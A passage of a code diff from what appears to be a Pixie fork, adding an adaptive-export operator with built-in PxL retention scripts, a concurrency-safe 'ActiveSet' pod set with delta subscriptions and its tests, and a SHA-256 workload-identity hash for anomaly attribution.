+ log.WithField("seeded", set.Size()).Info("streaming.ActiveSet seeded from rehydrated rows")
+}
- log.Infof("Getting current scripts for cluster")
- currentScripts, err := client.GetClusterScripts(clusterID, clusterName)
+// pixieAdapter wraps pixieapi.Adapter so its return type matches the
+// controller's PixieQuerier interface (which uses []map[string]any
+// rather than the pixieapi-internal Row alias).
+type pixieAdapter struct{ a *pixieapi.Adapter }
+
+func (p *pixieAdapter) Query(ctx context.Context, src string) ([]map[string]any, error) {
+ rows, err := p.a.Query(ctx, src)
if err != nil {
- return fmt.Errorf("failed to get data retention scripts: %w", err)
+ return nil, err
}
-
- actions := script.GetActions(definitions, currentScripts, script.ScriptConfig{
- ClusterName: clusterName,
- ClusterId: clusterID,
- CollectInterval: cfg.Worker().CollectInterval(),
- })
-
- var errs []error
-
- for _, s := range actions.ToDelete {
- log.Infof("Deleting script %s", s.Name)
- err := client.DeleteDataRetentionScript(s.ScriptId)
- if err != nil {
- errs = append(errs, err)
- }
+ out := make([]map[string]any, len(rows))
+ for i, r := range rows {
+ out[i] = map[string]any(r)
}
+ return out, nil
+}
- for _, s := range actions.ToUpdate {
- log.Infof("Updating script %s", s.Name)
- err := client.UpdateDataRetentionScript(clusterID, s.ScriptId, s.Name, s.Description, s.FrequencyS, s.Script)
- if err != nil {
- errs = append(errs, err)
+// installPresetScripts purges any stale ClickHouse-plugin retention
+// scripts on the cluster, then installs the operator's built-in PxL
+// scripts targeting the 13 socket_tracer tables we DDL'd. Cloud-side
+// "presets" are deliberately ignored: in this fork the legacy
+// "conn_stats export" / "dc snoop export" / "stack_traces export"
+// preset names predate the rev-2 schema and would silently fail to
+// write. conn_stats is now in the rev-2 schema, but it
+// ships as "ch-conn_stats" (operator-managed naming) — the legacy
+// "conn_stats export" preset name is still purged below so a stale
+// one doesn't double-write.
+func installPresetScripts(client *pixie.Client, clusterID, clusterName string) (int, error) {
+ current, err := client.GetClusterScripts(clusterID, clusterName)
+ if err != nil {
+ return 0, fmt.Errorf("get cluster scripts: %w", err)
+ }
+ currentNames := make([]string, 0, len(current))
+ for _, s := range current {
+ currentNames = append(currentNames, s.Name)
+ }
+ log.WithFields(log.Fields{
+ "already_on_cluster": len(current),
+ "cluster_script_names": currentNames,
+ }).Info("preset script install — purging managed + installing built-ins")
+
+ // Purge ONLY scripts we recognise as operator-managed or as legacy
+ // presets we know are broken in the rev-2 schema. User-authored
+ // retention scripts are left alone.
+ for _, s := range current {
+ if !isOperatorManagedScript(s.Name) {
+ log.WithField("script", s.Name).
+ Debug("preset install — leaving user-authored script alone")
+ continue
+ }
+ if err := client.DeleteDataRetentionScript(s.ScriptID); err != nil {
+ log.WithError(err).WithField("script", s.Name).Warn("failed to delete stale script")
+ continue
}
+ log.WithField("script", s.Name).Info("purged stale retention script")
}
- for _, s := range actions.ToCreate {
- log.Infof("Creating script %s", s.Name)
- err := client.AddDataRetentionScript(clusterID, s.Name, s.Description, s.FrequencyS, s.Script)
- if err != nil {
- errs = append(errs, err)
+ // Install built-ins.
+ presets := builtinPresetScripts()
+ installed := 0
+ for _, p := range presets {
+ if err := client.AddDataRetentionScript(clusterID, p.Name, p.Description, p.FrequencyS, p.Script); err != nil {
+ log.WithError(err).WithField("script", p.Name).Warn("failed to install built-in script")
+ continue
}
+ installed++
+ log.WithField("script", p.Name).Info("installed retention script")
}
+ return installed, nil
+}
- if len(errs) > 0 {
- return fmt.Errorf("errors while setting up data retention scripts: %v", errs)
+// isOperatorManagedScript decides whether a cluster-side retention
+// script is safe to delete during INSTALL_PRESET_SCRIPTS. The criteria:
+//
+// 1. Anything with the "ch-" prefix matches the operator's own
+// builtinPresetScripts naming (ch-<table>) — managed.
+// 2. The legacy AOCC presets we explicitly want to retire because
+// their target tables don't exist in the rev-2 schema:
+// "conn_stats export", "dc snoop export", "stack_traces export".
+//
+// Any other script is assumed user-authored and left alone.
+func isOperatorManagedScript(name string) bool {
+ if strings.HasPrefix(name, "ch-") {
+ return true
}
-
- log.Info("All done! The ClickHouse plugin is now configured.")
- return nil
+ switch name {
+ case "conn_stats export", "dc snoop export", "stack_traces export":
+ return true
+ }
+ return false
}
-func setupPixie(ctx context.Context, cfg config.Pixie, tries int, sleepTime time.Duration) (*pixie.Client, error) {
- apiKey := cfg.APIKey()
- host := cfg.Host()
- log.Infof("setupPixie: API Key length=%d, Host=%s", len(apiKey), host)
-
- for tries > 0 {
- // Use parent context - client stores this and uses it for all subsequent operations
- client, err := pixie.NewClient(ctx, apiKey, host)
- if err == nil {
- return client, nil
- }
- tries -= 1
- log.WithError(err).Warning("error creating Pixie API client")
- if tries > 0 {
- time.Sleep(sleepTime)
- }
+// builtinPresetScripts returns a minimum set of PxL scripts mirroring
+// the canonical Pixie preset shape — one bulk-write script per
+// socket_tracer table. Each adds namespace + pod columns and emits to
+// the matching CH table via px.display(df, '<table>') which the
+// retention plugin maps to forensic_db.<table>.
+//
+// Schedule: 10s. Window: -15s (overlap so we don't lose rows during
+// schedule jitter).
+func builtinPresetScripts() []*script.ScriptDefinition {
+ // Drop dotted-name tables (http2_messages.beta, kafka_events.beta):
+ // `px.DataFrame(table='…')` rejects them at PxL compile time, so a
+ // preset for them would be permanently broken. The cloud-side
+ // retention plugin would have to handle those if needed.
+ tables := []string{
+ "http_events", "dns_events", "redis_events", "mysql_events",
+ "pgsql_events", "cql_events", "mongodb_events", "amqp_events",
+ "mux_events", "tls_events",
+ // conn_stats — counter snapshots; same shape as
+ // the protocol-events PxL (DataFrame + namespace/pod cols +
+ // px.display). Each pull is one snapshot row per (remote tuple,
+ // protocol); ClickHouse merges by (hostname, event_time).
+ "conn_stats",
+ }
+ out := make([]*script.ScriptDefinition, 0, len(tables))
+ for _, t := range tables {
+ body := "import px\n" +
+ "df = px.DataFrame(table='" + t + "', start_time='-15s')\n" +
+ "df.namespace = px.upid_to_namespace(df.upid)\n" +
+ "df.pod = px.upid_to_pod_name(df.upid)\n" +
+ "px.display(df, '" + t + "')\n"
+ out = append(out, &script.ScriptDefinition{
+ Name: "ch-" + t,
+ Description: "adaptive_export builtin preset for " + t,
+ FrequencyS: 10,
+ Script: body,
+ IsPreset: false,
+ })
}
- return nil, fmt.Errorf("exceeded maximum number of retries")
+ return out
}
diff --git a/src/vizier/services/adaptive_export/internal/activeset/BUILD.bazel b/src/vizier/services/adaptive_export/internal/activeset/BUILD.bazel
new file mode 100644
index 00000000000..9003a0f131d
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/activeset/BUILD.bazel
@@ -0,0 +1,25 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+go_library(
+ name = "activeset",
+ srcs = ["activeset.go"],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+)
+
+pl_go_test(
+ name = "activeset_test",
+ srcs = ["activeset_test.go"],
+ embed = [":activeset"],
+)
diff --git a/src/vizier/services/adaptive_export/internal/activeset/activeset.go b/src/vizier/services/adaptive_export/internal/activeset/activeset.go
new file mode 100644
index 00000000000..3cbc40ff390
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/activeset/activeset.go
@@ -0,0 +1,267 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package activeset owns the "currently being streamed" pod set for
+// the rev-3 adaptive-write streaming path. One ActiveSet per
+// operator process.
+//
+// Why it exists: rev-2's pushPixieRows fan-out gated streaming
+// per-(hash, table); the fan-out spawned an O(active_hashes × tables)
+// concurrency tree that DoS'd vizier-query-broker under load. Rev-3
+// inverts the relationship: ONE PxL submission per table per refresh,
+// embedding an allowlist drawn from this ActiveSet. The set is keyed
+// per-pod, not per-hash, because pixie events have no hash dimension
+// — multiple anomaly hashes on the same pod share one stream slot.
+//
+// Membership is computed from kubescape attribution: a pod is in the
+// set iff there is at least one anomaly-attribution row for it whose
+// t_end is in the future.
+package activeset
+
+import (
+ "sync"
+ "time"
+)
+
+// Key identifies one pod in the set. "namespace/pod" matches what
+// `px.upid_to_pod_name` returns inside PxL, so embedding Keys verbatim
+// into a PxL allowlist filter requires no transformation.
+type Key struct {
+ Namespace string // may be empty; Render then yields the bare pod name
+ Pod string // pod name without the "namespace/" prefix
+}
+
+// Render returns the "namespace/pod" form used in PxL allowlists.
+// Pod-only Keys (empty Namespace) render as bare "pod" — kept for
+// host-pid edge cases though those don't currently reach a stream.
+func (k Key) Render() string {
+ if k.Namespace == "" { // no namespace: avoid emitting a leading "/"
+ return k.Pod
+ }
+ return k.Namespace + "/" + k.Pod
+}
+
+// Delta describes a change to the set. Subscribers receive deltas
+// to know when to re-evaluate stream submissions. The producers in
+// this file fill only one side per delta (Upsert → Added; Remove and
+// PruneExpired → Removed); consumers should still handle both.
+type Delta struct {
+ Added []Key // pods that entered the set
+ Removed []Key // pods that left the set
+ Version uint64 // monotonic; matches the post-delta version of the set
+}
+
+// ActiveSet is a goroutine-safe, version-counted pod set with
+// fan-out delta delivery.
+type ActiveSet struct {
+ mu sync.Mutex // guards members and version
+ members map[Key]time.Time // pod → t_end (when the active window expires absent further extension)
+ version uint64 // bumped on add/remove/prune, never on a pure t_end extension
+
+ // subs are independent buffered channels — one per subscriber.
+ // Buffered so a slow consumer can't block an upserter; oldest
+ // delta is dropped on overflow (subscriber observes a version
+ // skip and is expected to re-snapshot).
+ subsMu sync.Mutex // guards subs; taken after mu when both are held
+ subs []chan Delta
+}
+
+// New returns an empty ActiveSet: no members, version 0, no subscribers.
+func New() *ActiveSet {
+ return &ActiveSet{
+ members: map[Key]time.Time{},
+ }
+}
+
+// Upsert adds a pod or extends its t_end. Three cases:
+//   - new pod: stored, version bumped, Delta{Added} broadcast;
+//   - known pod, later tEnd: t_end updated, no version bump, no delta;
+//   - known pod, tEnd not after the stored one: no-op (t_end never shrinks).
+// `version` is advanced ONLY on membership changes (new pod added).
+// A pure t_end extension does NOT bump version — subscribers use
+// version skips as their "membership might have changed" signal, and
+// spurious bumps force unnecessary re-snapshots.
+func (s *ActiveSet) Upsert(k Key, tEnd time.Time) {
+ s.mu.Lock()
+ prev, existed := s.members[k]
+ if existed && !tEnd.After(prev) {
+ s.mu.Unlock()
+ return // no-op extension; quietly skip
+ }
+ s.members[k] = tEnd
+ if existed {
+ // Pure t_end extension: store new value, no version bump,
+ // no delta. Subscribers see no membership change.
+ s.mu.Unlock()
+ return
+ }
+ s.version++
+ v := s.version // capture under mu so the delta carries this change's version
+ s.mu.Unlock() // release before fan-out; broadcast only needs subsMu
+ s.broadcast(Delta{Added: []Key{k}, Version: v})
+}
+
+// Remove drops a pod and bumps version; no-op (no bump, no delta) if absent.
+// Real removals always emit a delta so subscribers can shrink allowlists.
+func (s *ActiveSet) Remove(k Key) {
+ s.mu.Lock()
+ if _, ok := s.members[k]; !ok {
+ s.mu.Unlock()
+ return
+ }
+ delete(s.members, k)
+ s.version++
+ v := s.version // capture under mu so the delta carries this change's version
+ s.mu.Unlock() // release before fan-out; broadcast only needs subsMu
+ s.broadcast(Delta{Removed: []Key{k}, Version: v})
+}
+
+// PruneExpired removes every pod whose t_end is at or before `at` and
+// returns the removed keys (nil if none). Emits ONE delta for the whole
+// batch; the returned slice is shared with that delta — do not mutate it.
+func (s *ActiveSet) PruneExpired(at time.Time) []Key {
+ s.mu.Lock()
+ var removed []Key
+ for k, tEnd := range s.members {
+ if !tEnd.After(at) { // t_end <= at → expired
+ removed = append(removed, k)
+ delete(s.members, k) // deleting during range is permitted in Go
+ }
+ }
+ if len(removed) == 0 {
+ s.mu.Unlock()
+ return nil
+ }
+ s.version++ // one bump for the whole batch
+ v := s.version
+ s.mu.Unlock()
+ s.broadcast(Delta{Removed: removed, Version: v})
+ return removed
+}
+
+// Snapshot returns the current set + version atomically. Caller owns
+// the returned slice (fresh copy, unspecified order) — safe to mutate.
+// For bootstrap-then-listen use SubscribeAndSnapshot to avoid a race.
+func (s *ActiveSet) Snapshot() ([]Key, uint64) {
+ s.mu.Lock()
+ defer s.mu.Unlock()
+ out := make([]Key, 0, len(s.members))
+ for k := range s.members {
+ out = append(out, k)
+ }
+ return out, s.version
+}
+
+// Size returns the current membership count, read under mu (test + metric helper).
+func (s *ActiveSet) Size() int {
+ s.mu.Lock()
+ defer s.mu.Unlock()
+ return len(s.members)
+}
+
+// Subscribe returns a channel of deltas. Buffer size sets the
+// tolerance for slow consumers (values < 1 are raised to 1); the
+// channel drops oldest deltas on overflow and subscribers MUST
+// re-snapshot if they detect a version gap. The channel is closed
+// only by Unsubscribe.
+//
+// Race hazard: a caller that does `Snapshot()` then `Subscribe()`
+// can miss any membership change that lands between the two calls.
+// Prefer `SubscribeAndSnapshot()` which is atomic.
+func (s *ActiveSet) Subscribe(buffer int) <-chan Delta {
+ if buffer < 1 {
+ buffer = 1
+ }
+ ch := make(chan Delta, buffer)
+ s.subsMu.Lock()
+ s.subs = append(s.subs, ch)
+ s.subsMu.Unlock()
+ return ch
+}
+
+// SubscribeAndSnapshot atomically captures the current membership
+// AND registers the subscription, so no change can fall into the gap
+// between the two. Deltas may still be dropped on buffer overflow
+// (see broadcast); a version gap means "re-snapshot".
+//
+// Returned tuple:
+//
+// keys — current membership at snapshot time
+// deltas — channel of subsequent deltas (drop-oldest on overflow)
+// version — the version of `keys`; consumers should skip deltas
+// with `delta.Version <= version` (already reflected in `keys`)
+//
+// This is the recommended consumer API for bootstrapping.
+func (s *ActiveSet) SubscribeAndSnapshot(buffer int) ([]Key, <-chan Delta, uint64) {
+ if buffer < 1 {
+ buffer = 1
+ }
+ ch := make(chan Delta, buffer)
+ // Hold BOTH mutexes for the duration of {snapshot, register}.
+ // Order: s.mu first (membership), then s.subsMu (subscriber list).
+ // broadcast() takes only s.subsMu, so there's no ordering risk.
+ s.mu.Lock()
+ keys := make([]Key, 0, len(s.members))
+ for k := range s.members {
+ keys = append(keys, k)
+ }
+ version := s.version
+ s.subsMu.Lock()
+ s.subs = append(s.subs, ch)
+ s.subsMu.Unlock()
+ s.mu.Unlock() // mutators bump version under mu, so none can slip in before registration
+ return keys, ch, version
+}
+
+// Unsubscribe removes and closes a previously-returned channel.
+// Idempotent (no error on unknown chan).
+func (s *ActiveSet) Unsubscribe(ch <-chan Delta) {
+ s.subsMu.Lock()
+ defer s.subsMu.Unlock()
+ for i, c := range s.subs {
+ // explicit conversion to the receive-only type so c is comparable with ch
+ if (<-chan Delta)(c) == ch {
+ s.subs = append(s.subs[:i], s.subs[i+1:]...)
+ close(c) // broadcast sends under subsMu too, so no send can race this close
+ return
+ }
+ }
+}
+
+// broadcast attempts to send to every subscriber non-blockingly. On
+// buffer overflow the OLDEST delta is dropped so the most recent
+// state-change always reaches the subscriber (it'll re-snapshot if
+// the version gap matters). This is the contract: subscribers MUST
+// tolerate dropped deltas + use Snapshot to reconcile.
+func (s *ActiveSet) broadcast(d Delta) {
+ s.subsMu.Lock() // held for the whole fan-out; every send below is non-blocking
+ defer s.subsMu.Unlock()
+ for _, c := range s.subs {
+ select {
+ case c <- d:
+ default:
+ // Drop oldest by draining one then sending.
+ select {
+ case <-c:
+ default: // consumer emptied the buffer in the meantime; nothing to drop
+ }
+ select {
+ case c <- d:
+ default: // still full: give up on this delta for this subscriber
+ }
+ }
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/activeset/activeset_test.go b/src/vizier/services/adaptive_export/internal/activeset/activeset_test.go
new file mode 100644
index 00000000000..47ff9ad7c78
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/activeset/activeset_test.go
@@ -0,0 +1,225 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package activeset
+
+import (
+ "sync"
+ "testing"
+ "time"
+)
+
+func TestUpsertEmitsAddedDelta(t *testing.T) {
+ s := New()
+ ch := s.Subscribe(4) // subscribe before the Upsert so its delta is captured
+ s.Upsert(Key{Namespace: "ns", Pod: "p1"}, time.Now().Add(5*time.Minute))
+ select {
+ case d := <-ch:
+ if len(d.Added) != 1 || d.Added[0].Pod != "p1" {
+ t.Fatalf("expected added=[p1], got %+v", d)
+ }
+ case <-time.After(200 * time.Millisecond): // Upsert broadcasts before returning, so this only fires if no delta was sent
+ t.Fatalf("no delta")
+ }
+}
+
+func TestUpsertExtendDoesNotEmitDelta(t *testing.T) {
+ s := New()
+ ch := s.Subscribe(4)
+ k := Key{Namespace: "ns", Pod: "p1"}
+ t0 := time.Now()
+ s.Upsert(k, t0.Add(1*time.Minute))
+ <-ch // drain initial add
+ s.Upsert(k, t0.Add(5*time.Minute)) // later t_end for a known pod: pure extension
+ select {
+ case d := <-ch:
+ t.Fatalf("unexpected delta on pure extension: %+v", d)
+ case <-time.After(100 * time.Millisecond):
+ // good: nothing arrived within the window
+ }
+}
+
+func TestRemoveEmitsRemovedDelta(t *testing.T) {
+ s := New()
+ ch := s.Subscribe(4)
+ k := Key{Namespace: "ns", Pod: "p1"}
+ s.Upsert(k, time.Now().Add(1*time.Minute))
+ <-ch // drain the add delta so the next receive is the removal
+ s.Remove(k)
+ select {
+ case d := <-ch:
+ if len(d.Removed) != 1 || d.Removed[0].Pod != "p1" {
+ t.Fatalf("expected removed=[p1], got %+v", d)
+ }
+ case <-time.After(200 * time.Millisecond):
+ t.Fatalf("no delta")
+ }
+}
+
+func TestPruneExpiredBatchesRemovals(t *testing.T) {
+ s := New()
+ ch := s.Subscribe(4) // buffer 4 holds the three add deltas without overflow
+ now := time.Now()
+ s.Upsert(Key{Pod: "a"}, now.Add(-time.Minute)) // already expired
+ s.Upsert(Key{Pod: "b"}, now.Add(time.Minute)) // still active
+ s.Upsert(Key{Pod: "c"}, now.Add(-time.Second)) // already expired
+ // drain the three add deltas
+ for i := 0; i < 3; i++ {
+ <-ch
+ }
+ removed := s.PruneExpired(now) // a and c have t_end <= now
+ if len(removed) != 2 {
+ t.Fatalf("expected 2 removals, got %d (%v)", len(removed), removed)
+ }
+ select {
+ case d := <-ch:
+ if len(d.Removed) != 2 {
+ t.Fatalf("expected single delta with 2 removals, got %+v", d)
+ }
+ case <-time.After(200 * time.Millisecond):
+ t.Fatalf("no delta from PruneExpired")
+ }
+}
+
+func TestUpsertExtendDoesNotAdvanceVersion(t *testing.T) {
+ // Per CR feedback (activeset.go:110): pure extension shouldn't
+ // bump version, because the version is the consumer's "did
+ // membership change?" signal. Spurious bumps make subscribers
+ // re-snapshot for nothing.
+ s := New()
+ k := Key{Pod: "p"}
+ s.Upsert(k, time.Now().Add(time.Minute))
+ _, v1 := s.Snapshot() // version after the initial add
+ // Extend the SAME pod's t_end repeatedly.
+ for i := 0; i < 10; i++ {
+ s.Upsert(k, time.Now().Add(time.Duration(i+2)*time.Minute)) // i+2 keeps every t_end later than the previous one
+ }
+ _, v2 := s.Snapshot()
+ if v2 != v1 {
+ t.Fatalf("version advanced on pure extension: v1=%d v2=%d", v1, v2)
+ }
+ // But a new pod DOES advance.
+ s.Upsert(Key{Pod: "q"}, time.Now().Add(time.Minute))
+ _, v3 := s.Snapshot()
+ if v3 == v2 {
+ t.Fatalf("version did NOT advance on new pod add: v=%d", v3)
+ }
+}
+
+func TestSnapshotReturnsCurrentMembers(t *testing.T) {
+ s := New()
+ s.Upsert(Key{Namespace: "n1", Pod: "p1"}, time.Now().Add(time.Minute))
+ s.Upsert(Key{Namespace: "n2", Pod: "p2"}, time.Now().Add(time.Minute))
+ keys, v := s.Snapshot()
+ if len(keys) != 2 {
+ t.Fatalf("expected 2 keys, got %d", len(keys))
+ }
+ if v == 0 { // each new key bumps version, so it must be non-zero here
+ t.Fatalf("version should have advanced")
+ }
+}
+
+func TestSubscriberOverflowDropsOldest(t *testing.T) {
+ s := New()
+ ch := s.Subscribe(2) // tiny buffer
+ for i := 0; i < 10; i++ {
+ s.Upsert(Key{Pod: string(rune('a' + i))}, time.Now().Add(time.Minute)) // 10 distinct pods → 10 add deltas into a 2-slot buffer
+ }
+ // We expect at most buffer-size deltas to survive — the rest were dropped.
+ collected := 0
+ for {
+ select {
+ case <-ch:
+ collected++
+ case <-time.After(50 * time.Millisecond): // channel quiet: all surviving deltas have been read
+ if collected == 0 {
+ t.Fatalf("got zero deltas; broadcast is broken")
+ }
+ if collected > 2 {
+ t.Fatalf("got %d deltas from a 2-buffer channel; drop-oldest broken", collected)
+ }
+ return
+ }
+ }
+}
+
+// TestSubscribeAndSnapshot_RaceFreeBootstrap — per CR (activeset.go:183):
+// a consumer that wants both "initial state" + "all future deltas"
+// must be able to do so without missing changes between Snapshot()
+// and Subscribe(). Verify the combined helper.
+func TestSubscribeAndSnapshot_RaceFreeBootstrap(t *testing.T) {
+ s := New()
+ s.Upsert(Key{Pod: "preexisting"}, time.Now().Add(time.Minute))
+
+ // The hostile interleaving this guards against: with separate
+ // Snapshot and Subscribe calls, an Upsert landing between them is
+ // lost. Here the Upsert is issued after the combined call returns,
+ // so the test asserts the weaker property that it arrives as a
+ // delta newer than the snapshot version.
+ keys, ch, version := s.SubscribeAndSnapshot(4)
+ // Concurrent upsert AFTER subscription.
+ go func() {
+ s.Upsert(Key{Pod: "racy"}, time.Now().Add(time.Minute))
+ }()
+
+ if len(keys) != 1 || keys[0].Pod != "preexisting" {
+ t.Fatalf("initial snapshot wrong: %+v", keys)
+ }
+ // Drain delta.
+ select {
+ case d := <-ch:
+ if d.Version <= version {
+ t.Fatalf("delta version %d <= snapshot version %d", d.Version, version)
+ }
+ seen := false
+ for _, k := range d.Added {
+ if k.Pod == "racy" {
+ seen = true
+ }
+ }
+ if !seen {
+ t.Fatalf("racy pod not in delta added=%v", d.Added)
+ }
+ case <-time.After(500 * time.Millisecond):
+ t.Fatalf("no delta within 500ms")
+ }
+}
+
+func TestConcurrentUpsertsAreSafe(t *testing.T) {
+ s := New()
+ var wg sync.WaitGroup
+ for i := 0; i < 50; i++ {
+ i := i // per-iteration copy for the closure (needed before Go 1.22)
+ wg.Add(1)
+ go func() {
+ defer wg.Done()
+ s.Upsert(Key{Pod: string(rune('a' + (i % 26)))}, time.Now().Add(time.Minute)) // 50 calls over 26 distinct keys: mixes adds with extensions/no-ops
+ }()
+ }
+ wg.Wait()
+ if s.Size() == 0 {
+ t.Fatalf("size 0 after 50 concurrent upserts")
+ }
+}
+
+func TestRenderKey(t *testing.T) {
+ if got := (Key{Namespace: "n", Pod: "p"}).Render(); got != "n/p" { // namespaced form
+ t.Fatalf("render = %q, want n/p", got)
+ }
+ if got := (Key{Pod: "p"}).Render(); got != "p" { // empty namespace: bare pod, no leading slash
+ t.Fatalf("render(no ns) = %q, want p", got)
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/anomaly/BUILD.bazel b/src/vizier/services/adaptive_export/internal/anomaly/BUILD.bazel
new file mode 100644
index 00000000000..8f0d97ac68c
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/anomaly/BUILD.bazel
@@ -0,0 +1,34 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+go_library(
+ name = "anomaly",
+ srcs = ["hash.go"],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+)
+
+pl_go_test(
+ name = "anomaly_test",
+ srcs = [
+ "hash_bench_test.go",
+ "hash_test.go",
+ ],
+ embed = [":anomaly"],
+)
diff --git a/src/vizier/services/adaptive_export/internal/anomaly/hash.go b/src/vizier/services/adaptive_export/internal/anomaly/hash.go
new file mode 100644
index 00000000000..0a0bbaac613
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/anomaly/hash.go
@@ -0,0 +1,86 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package anomaly defines the source-agnostic identity of one anomaly
+// observation: a four-field Target and the deterministic AnomalyHash
+// derived from it.
+//
+// AnomalyHash is the join key written by the operator into
+// forensic_db.adaptive_attribution and joined against pixie observation
+// tables on (hostname, namespace, pod, time_).
+//
+// The hash is workload-identity, NOT event-identity: it carries no
+// timestamp and no rule id. The same workload firing N anomalies
+// produces N kubescape rows, all collapsing to the same hash. This
+// makes the hash a meaningful partition / join key.
+package anomaly
+
+import (
+ "crypto/sha256"
+ "encoding/binary"
+ "encoding/hex"
+)
+
+// AnomalyHash is the 32-hex-character (16-byte) join key derived from
+// a Target. Same Target → same AnomalyHash, every time.
+type AnomalyHash string
+
+// Target is the workload-identity used for hashing. Pod and Namespace
+// MAY be empty (host-pid processes outside any pod). PID + Comm are
+// always required by the producer; the hash function does not enforce
+// that — extraction is the place to enforce.
+//
+// Note: timestamp and rule id deliberately not in the hash. Different
+// rule firings on the same workload share the same hash; the time
+// dimension is carried separately in the attribution row's
+// (t_start, t_end) interval.
+type Target struct {
+ PID uint64
+ Comm string
+ Pod string // may be empty
+ Namespace string // may be empty
+}
+
+// Hash returns the deterministic 32-hex-character AnomalyHash for the
+// given Target. SHA-256 over a length-prefixed canonical encoding of
+// the four identity fields, truncated to the leading 16 bytes
+// (32 hex chars). A 128-bit digest (~64-bit birthday bound) suffices
+// for the workload cardinality envelope.
+//
+// The encoding is: PID as big-endian uint64, followed by each string
+// as uint32-LE length || bytes. Length prefixing is collision-safe
+// across delimiter-bearing or empty inputs (a plain ":"-join is not —
+// e.g. {Pod:"a:b", NS:""} would collide with {Pod:"a", NS:"b:"}).
+func Hash(t Target) AnomalyHash {
+ h := sha256.New()
+ var pidBuf [8]byte
+ binary.BigEndian.PutUint64(pidBuf[:], t.PID)
+ h.Write(pidBuf[:])
+ writeLenPrefixed(h, t.Comm)
+ writeLenPrefixed(h, t.Pod)
+ writeLenPrefixed(h, t.Namespace)
+ sum := h.Sum(nil)
+ return AnomalyHash(hex.EncodeToString(sum[:16]))
+}
+
+// writeLenPrefixed writes uint32-LE length followed by the raw bytes.
+// 4 GiB per field is well above any realistic Pod/Namespace/Comm size.
+func writeLenPrefixed(h interface{ Write([]byte) (int, error) }, s string) {
+ var lenBuf [4]byte
+ binary.LittleEndian.PutUint32(lenBuf[:], uint32(len(s)))
+ _, _ = h.Write(lenBuf[:])
+ _, _ = h.Write([]byte(s))
+}
diff --git a/src/vizier/services/adaptive_export/internal/anomaly/hash_bench_test.go b/src/vizier/services/adaptive_export/internal/anomaly/hash_bench_test.go
new file mode 100644
index 00000000000..74d0e8d0b75
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/anomaly/hash_bench_test.go
@@ -0,0 +1,119 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package anomaly
+
+import (
+ "fmt"
+ "sync/atomic"
+ "testing"
+)
+
+// anomaly.Hash sits on the HOTTEST path in AE: it runs for every
+// kubescape event the trigger fans into the controller. At ~1k
+// events/sec on a busy cluster, that's 1k Hash() calls/sec PLUS the
+// kubescape extraction allocations on each upstream Row.
+//
+// These benchmarks establish the per-call cost. benchTarget's fields
+// are sized like a typical workload: a 51-char k8s Pod name, a 20-char
+// Namespace, and a 4-char Comm ("java"; the kernel caps comm at 16 bytes).
+
+func benchTarget(i int) Target {
+ return Target{
+ PID: uint64(1000 + i),
+ Comm: "java",
